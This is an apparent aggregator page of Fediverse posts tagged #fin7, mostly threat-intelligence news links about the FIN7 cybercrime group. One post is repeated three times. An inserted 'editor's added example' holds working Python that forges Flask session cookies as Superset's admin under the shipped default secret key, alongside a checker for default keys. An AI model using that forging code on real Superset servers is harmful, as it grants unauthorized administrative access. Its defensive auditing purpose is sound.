#fin7 — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #fin7, aggregated by home.social.
-
GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS
-
Ukraine’s largest bank PrivatBank Targeted with SmokeLoader malware – Source: hackread.com https://ciso2ciso.com/ukraines-largest-bank-privatbank-targeted-with-smokeloader-malware-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #CyberAttacks #BlackBasta #PrivatBank #Hackread #Phishing #security #UAC0006 #Ukraine #Russia #FIN7
-
Ukraine’s largest bank PrivatBank Targeted with SmokeLoader malware https://hackread.com/ukraine-largest-bank-privatbank-smokeloader-malware/ #Cybersecurity #CyberAttacks #BlackBasta #PrivatBank #Security #Phishing #UAC0006 #Ukraine #Russia #FIN7
-
One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks
#FIN7
https://unit42.paloaltonetworks.com/graph-neural-networks/
-
Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm
https://krebsonsecurity.com/2024/12/web-hacking-service-araneida-tied-to-turkish-it-firm/
#U.S.DepartmentofHealthandHumanServices #ori0nbusiness@protonmail.com #altugsara321@gmail.com #Ne'er-Do-WellNews #ALittleSunshine #AraneidaScanner #InvictiSecurity #TheComingStorm #BilitroYazilim #MattSciberras #Breadcrumbs #domaintools #NeilRoseman #ZachEdwards #SilentPush #AltugSara #Acunetix #Fin7
-
The Russian cybercrime group FIN7 ran a network of fake AI undressing sites that delivered credential stealing malware to those who uploaded pictures. I gotta say, this is one group of cybercrime victims that I don't feel sorry for.
https://www.silentpush.com/blog/fin7-malware-deepfake-ai-honeypot/
#FIN7 #Russia #Cybercrime #NetSupport #NetSupportRAT #RAT #Malware #CredentialTheft #AI #Deepfake #Deepfakes #DeepNude #DeepNueds #SilentPush
-
FIN7 Cybercrime Gang Evolves with Ransomware and Hacking Tools https://hackread.com/fin7-cybercrime-gang-ransomware-hacking-tools/ #CyberAttack #CyberCrime #Ransomware #Security #security #hacking #Russia #FIN7
-
Threat group FIN7 adapts with new tactics and tools, researchers say⤵️
#FIN7 #cybersecurity #technology #infosec #ransomware
https://cnews.link/fin7-cyber-threat-group-new-tactics-tools/
-
FIN7 Cybercriminal Gang Adopts Techniques to Elude EDR and Automate Attacks https://thecyberexpress.com/fin7-gang-elude-edr-and-automate-attacks/ #TheCyberExpressNews #CybersecurityNews #TheCyberExpress #FirewallDaily #AvNeutralizer #cybercriminal #FIN7 #EDR
-
📬 Reading tips: Marvel hunts the "Captain America: Brave New World" leaker
#Lesetipps #AME #CaptainAmerica #FIN7 #Kriminalisierung #Marvel #Systemhack https://sc.tarnkappe.info/4e4a95
-
FIN7 Cybercrime Group Strikes US Auto Sector Using Carbanak – Source: securityboulevard.com https://ciso2ciso.com/fin7-cybercrime-group-strikes-us-auto-sector-using-carbanak-source-securityboulevard-com/ #multifactorauthentication #phishingawarenesstraining #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #CybersecurityNews #SecurityBoulevard #Identity&Access #Cybersecurity #spearphishing #ransomware #Carbanak #FIN7
-
FIN7 targeted a large U.S. carmaker with phishing attacks – Source: securityaffairs.com https://ciso2ciso.com/fin7-targeted-a-large-u-s-carmaker-with-phishing-attacks-source-securityaffairs-com/ #rssfeedpostgeneratorecho #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #SecurityNews #hackingnews #CyberCrime #Cybercrime #hacking #Malware #FIN7 #APT
-
Onapsis and Flashpoint produced a 29 report on the cyber threat landscape for SAP applications over the past 4 years. SAP is the world's largest provider of enterprise application software. The report highlights the material risk of SAP ransomware attacks and the growing maturity of cybercriminal capabilities. Their appendices at the bottom list known SAP vulnerabilities (if they're on CISA's Known Exploited Vulnerabilities (KEV) Catalog), as well as MITRE ATT&CK techniques associated with SAP exploitation, and threat actors (financially motivated and ransomware groups) targeting SAP-using organizations. 🔗 (PDF) https://go.onapsis.com/threat-report/ch4tter
#SAP #vulnerability #cybercrime #threatintel #FIN13 #CobaltSpider #FIN7 #BlackCat #AlphV #BianLian #BlackBasta
-
FIN7 Hackers Attacking IT Employees Of Automotive Industry https://gbhackers.com/fin7-automotive-it-targets/ #IncidentResponse #cybersecurity #spearphishing #CyberAttack #Phishing #Fin7
-
BlackBerry reports on a spear-phishing campaign in late 2023 by the financially motivated FIN7 targeting a large U.S. automotive manufacturer. They targeted IT department employees with admin rights, using a free IP scanning tool as the lure, to deploy the Anunak backdoor. FIN7 used living-off-the-land binaries, scripts and libraries (LOLBAS). MITRE ATT&CK TTPs and IOCs provided. 🔗 https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry
-
Another week, another newsletter - catch up on the week's infosec news here:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.
#Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.
#FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign
#LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?
The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.
Have a great week ahead folks, I hope this newsletter proves helpful!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-240423-300423
#infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD
-
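The Superset item above turns on one mechanism: a Flask session cookie is only an HMAC over its payload, so anyone who knows the SECRET_KEY can mint a cookie for any user. The block below is an editor's added example, not code from the newsletter, from Flask or from Apache Superset. It re-implements with the standard library the scheme Flask's SecureCookieSessionInterface uses (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC key derivation, SHA-1), so it can both mint a test cookie and, the check a practitioner actually wants, tell whether a cookie from one of your own instances validates under a well-known default key. The default key value is taken from Superset's shipped config.py; the other candidate strings are placeholder values seen in Superset docs and are an assumption. The session contents are constructed.

```python
"""Flask session cookies as itsdangerous' URLSafeTimedSerializer produces them,
re-implemented with the standard library so the check runs offline.
Added example; not code from the newsletter, Flask or Apache Superset."""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

# Flask's SecureCookieSessionInterface: salt "cookie-session", HMAC key
# derivation, SHA-1 digest.
SALT = b"cookie-session"

# Superset's shipped default from superset/config.py. "\2" and "\1" are
# control characters; "\e", "\y", "\h" are not escapes and stay literal.
SUPERSET_DEFAULT_KEY = "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h"

# Assumption: placeholder values that appear in Superset docs and sample configs.
CANDIDATE_DEFAULT_KEYS = [
    SUPERSET_DEFAULT_KEY,
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
    "thisISaSECRET_1234",
    "YOUR_OWN_RANDOM_GENERATED_SECRET_KEY",
]


def _b64(data: bytes) -> str:
    # itsdangerous: URL-safe base64 with padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derived_key(secret_key: str) -> bytes:
    # key_derivation="hmac": HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode("utf-8"), SALT, hashlib.sha1).digest()


def _signature(secret_key: str, signed_value: bytes) -> bytes:
    return hmac.new(_derived_key(secret_key), signed_value, hashlib.sha1).digest()


def sign_flask_session(session: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Return a cookie value Flask would accept for `session` under `secret_key`."""
    ts = int(time.time()) if timestamp is None else timestamp
    payload = _b64(json.dumps(session, separators=(",", ":"), sort_keys=True).encode())
    ts_part = _b64(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    # The timed signer signs "<payload>.<timestamp>", then appends the signature.
    signed_value = f"{payload}.{ts_part}".encode("ascii")
    return f"{payload}.{ts_part}.{_b64(_signature(secret_key, signed_value))}"


def verify_flask_session(cookie: str, secret_key: str) -> Optional[dict]:
    """Return the session dict if `cookie` was signed with `secret_key`, else None."""
    try:
        # rsplit keeps a leading "." (zlib-compressed payload marker) with the payload.
        payload, ts_part, sig_part = cookie.rsplit(".", 2)
        signed_value = f"{payload}.{ts_part}".encode("ascii")
        if not hmac.compare_digest(_signature(secret_key, signed_value), _unb64(sig_part)):
            return None
        raw = _unb64(payload[1:]) if payload.startswith(".") else _unb64(payload)
        if payload.startswith("."):
            raw = zlib.decompress(raw)
        return json.loads(raw)
    except (ValueError, zlib.error):
        return None


def find_default_key(cookie: str, candidates=CANDIDATE_DEFAULT_KEYS) -> Optional[str]:
    """The check: which well-known key, if any, validates this cookie?"""
    for key in candidates:
        if verify_flask_session(cookie, key) is not None:
            return key
    return None


if __name__ == "__main__":
    # Constructed sample: the admin session an attacker would mint against a
    # default-key install (Flask-Login keeps the user id under "_user_id").
    forged = sign_flask_session({"_user_id": "1", "_fresh": True}, SUPERSET_DEFAULT_KEY)
    print("forged cookie:", forged)
    print("valid under default key:", verify_flask_session(forged, SUPERSET_DEFAULT_KEY))
    print("valid under a random key:", verify_flask_session(forged, "not-the-key"))
    print("default key in use:", find_default_key(forged))
```

To check a live instance, paste the value of its `session` cookie into `find_default_key`; a non-None result means the key has to be rotated, which also invalidates every existing session. The comparison uses `hmac.compare_digest` so the checker itself does not leak timing information about the candidate keys.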
It's been a heck of a week, with tonnes of great research and tooling that I'm sure you're going to get a kick out of - check out our wrap-up for all the news!:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
Kaspersky researchers shone a light on the Dark Web trade in Google Play Loaders - a service to help inject malware into legitimate, and supposedly vetted apps, with guarantees of >1 week up-time and the option to boost your spread with targeted Ads.
#Nokoyawa ransomware have clearly got some talent on their team, having abused a #CLFS 0-day prior to Microsoft patching it last week - one of 5 different exploits they've used, mind you - and they appear to have a new, distinct ransomware strain in rotation, too.
There's heaps more great threat reporting, including a report that #FIN7 and former #Conti (#FIN12/#WizardSpider) members are collaborating on a new backdoor, and a crypto-mining campaign that may be the canary in the coal mine, indicating broader uptake of BYOVD and IPFS by low-level operators.
The #QueueJumper vulnerability from last week looks primed to explode in coming days, with a no-fix vulnerability in Microsoft Intune capping off a lousy week for Windows admins struggling to keep their networks secure.
TOOLING. Ooooh boy, this was a good week for tooling and tradecraft, ladies and gentlemen.
The #redteam have a new port of the SharpHound AD enumeration tool for Cobalt Strike; a great reference piece on leveraging stolen Office tokens to bypass MFA and access cloud workloads, and a list of keywords to avoid when crafting stealthy PowerShell scripts.
The #blueteam have a script to help tweak VM settings to circumvent malware anti-analysis checks; Procmon for macOS, and a lightweight bastion host to help redirect and record traffic sent to honeypots in your network.
This was a fun one to write up, with heaps of interesting reads and takeaways to be had. Get amongst it!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #dfir #soc #threatintel #threatintelligence #darkweb #microsoft #azure #mfa #mfabypass #cobaltstrike #bloodhound #sharphound #byovd #ipfs #intune #GooglePlay #Android #zeroday #0day
-
It's been a heck of a week, with tonnes of great research and tooling that I'm sure you're going to get a kick out of - check out our wrap-up for all the news!:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
Kaspersky researchers shone a light on the Dark Web trade in Google Play Loaders - a service to help inject malware into legitimate, and supposedly vetted apps, with guarantees of >1 week up-time and the option to boost your spread with targeted Ads.
#Nokoyawa ransomware have clearly got some talent on their team, having abused a #CLFS 0-day prior to Microsoft patching it last week - one of 5 different exploits they've used, mind you - and they appear to have a new, distinct ransomware strain in rotation, too.
There's heaps more great threat reporting, including a report that #FIN7 and former #Conti (#FIN12/#WizardSpider) members are collaborating on a new backdoor, and a crypto-mining campaign that may be the canary in the coal mine, indicating broader uptake of BYOVD and IPFS by low-level operators.
The #QueueJumper vulnerability from last week looks primed to explode in coming days, with a no-fix vulnerability in Microsoft Intune capping off a lousy week for Windows admins struggling to keep their networks secure.
TOOLING. Ooooh boy, this was a good week for tooling and tradecraft, ladies and gentlemen.
The #redteam have a new port of the SharpHound AD enumeration tool for Cobalt Strike; a great reference piece on leveraging stolen Office tokens to bypass MFA and access cloud workloads, and a list of keywords to avoid when crafting stealthy PowerShell scripts.
The #blueteam have a script to help tweak VM settings to circumvent malware anti-analysis checks; Procmon for macOS, and a lightweight bastion host to help redirect and record traffic sent to honeypots in your network.
This was a fun one to write up, with heaps of interesting reads and takeaways to be had. Get amongst it!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #dfir #soc #threatintel #threatintelligence #darkweb #microsoft #azure #mfa #mfabypass #cobaltstrike #bloodhound #sharphound #byovd #ipfs #intune #GooglePlay #Android #zeroday #0day
-
It's been a heck of a week, with tonnes of great research and tooling that I'm sure you're going to get a kick out of - check out our wrap-up for all the news!:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
Kaspersky researchers shone a light on the Dark Web trade in Google Play Loaders - a service to help inject malware into legitimate, and supposedly vetted apps, with guarantees of >1 week up-time and the option to boost your spread with targeted Ads.
#Nokoyawa ransomware have clearly got some talent on their team, having abused a #CLFS 0-day prior to Microsoft patching it last week - one of 5 different exploits they've used, mind you - and they appear to have a new, distinct ransomware strain in rotation, too.
There's heaps more great threat reporting, including a report that #FIN7 and former #Conti (#FIN12/#WizardSpider) members are collaborating on a new backdoor, and a crypto-mining campaign that may be the canary in the coal mine, indicating broader uptake of BYOVD and IPFS by low-level operators.
The #QueueJumper vulnerability from last week looks primed to explode in coming days, with a no-fix vulnerability in Microsoft Intune capping off a lousy week for Windows admins struggling to keep their networks secure.
TOOLING. Ooooh boy, this was a good week for tooling and tradecraft, ladies and gentlemen.
The #redteam have a new port of the SharpHound AD enumeration tool for Cobalt Strike; a great reference piece on leveraging stolen Office tokens to bypass MFA and access cloud workloads, and a list of keywords to avoid when crafting stealthy PowerShell scripts.
The #blueteam have a script to help tweak VM settings to circumvent malware anti-analysis checks; Procmon for macOS, and a lightweight bastion host to help redirect and record traffic sent to honeypots in your network.
This was a fun one to write up, with heaps of interesting reads and takeaways to be had. Get amongst it!
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #dfir #soc #threatintel #threatintelligence #darkweb #microsoft #azure #mfa #mfabypass #cobaltstrike #bloodhound #sharphound #byovd #ipfs #intune #GooglePlay #Android #zeroday #0day
-
From #THN: "An exhaustive analysis of #FIN7 has unmasked the #cybercrime syndicate's organizational hierarchy, alongside unraveling its role as an affiliate for mounting ransomware attacks.
It has also exposed deeper associations between the group and the larger threat ecosystem comprising the now-defunct #ransomware #DarkSide, #REvil, and #LockBit families.
The highly active threat group, also known as #Carbanak, is known for employing an extensive arsenal of tools and tactics to expand its "cybercrime horizons," including adding ransomware to its playbook and setting up fake security companies to lure researchers into conducting ransomware attacks under the guise of penetration testing."
https://thehackernews.com/2022/12/fin7-cybercrime-syndicate-emerges-as.html?_m=3n%2e009a%2e2920%2evo0ao07ax6%2e1w1s
-
Wow. This is an absolutely fascinating read by #Prodaft about #FIN7 and #ThreatIntel well worth the name.
I encourage everyone to take the time to browse and read this FREE report.
https://www.prodaft.com/resource/detail/fin7-unveiled-deep-dive-notorious-cybercrime-gang
-
“Pen tester” who helped FIN7 gang cause $1 billion damage, sentenced to five years behind bars https://www.bitdefender.com/blog/hotforsecurity/pen-tester-who-helped-fin7-gang-cause-1-billion-damage-sentenced-to-five-years-behind-bars/ #databreach #Guestblog #Law&order #Dataloss #Carbanak #Malware #FIN7